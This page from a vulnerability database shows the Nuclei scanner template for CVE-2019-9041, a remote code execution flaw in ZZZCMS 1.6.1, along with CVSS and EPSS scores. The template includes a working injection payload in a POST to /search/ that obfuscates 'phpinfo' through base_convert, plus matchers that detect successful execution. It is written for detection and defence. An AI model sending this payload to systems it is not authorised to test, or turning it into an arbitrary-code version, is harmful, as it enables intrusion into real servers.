Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-9041
HistoryFeb 10, 2021 - 11:09 a.m.

ZZZCMS 1.6.1 - Remote Code Execution

2021-02-1011:09:46
ProjectDiscovery
github.com
3

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

7.5 High

AI Score

Confidence

High

6.5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

0.024 Low

EPSS

Percentile

89.8%

ZZZCMS zzzphp V1.6.1 is vulnerable to remote code execution via the inc/zzz_template.php file because the parserIfLabel() function’s filtering is not strict, resulting in PHP code execution as demonstrated by the if:assert substring.

id: CVE-2019-9041

info:
  name: ZZZCMS 1.6.1 - Remote Code Execution
  author: pikpikcu
  severity: high
  description: ZZZCMS zzzphp V1.6.1 is vulnerable to remote code execution via the inc/zzz_template.php file because the parserIfLabel() function's filtering is not strict, resulting in PHP code execution as demonstrated by the if:assert substring.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patch or upgrade to a newer version of ZZZCMS.
  reference:
    - https://www.exploit-db.com/exploits/46454/
    - http://www.iwantacve.cn/index.php/archives/118/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9041
    - https://github.com/Elsfa7-110/kenzer-templates
    - https://github.com/sobinge/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2019-9041
    cwe-id: CWE-917
    epss-score: 0.02876
    epss-percentile: 0.9052
    cpe: cpe:2.3:a:zzzcms:zzzphp:1.6.1:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: zzzcms
    product: zzzphp
  tags: cve,cve2019,zzzcms,rce,edb

http:
  - raw:
      - |
        POST /search/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
      - |
        POST /search/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - '!contains(body_1, "phpinfo")'
          - 'contains_all(body_2, "phpinfo","PHP Version")'
        condition: and
# digest: 4a0a00473045022100c44cf9d0bfd3f78df766d34e58b1a8db6965b6cc4158e006fd861575cab19ea802207d492430d47955332714faa9eaf2ed7f3d4cf504d3ffc3476a50a84f3401203a:922c64590222798bb761d5b6d8e72950

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

7.5 High

AI Score

Confidence

High

6.5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

0.024 Low

EPSS

Percentile

89.8%

Related for NUCLEI:CVE-2019-9041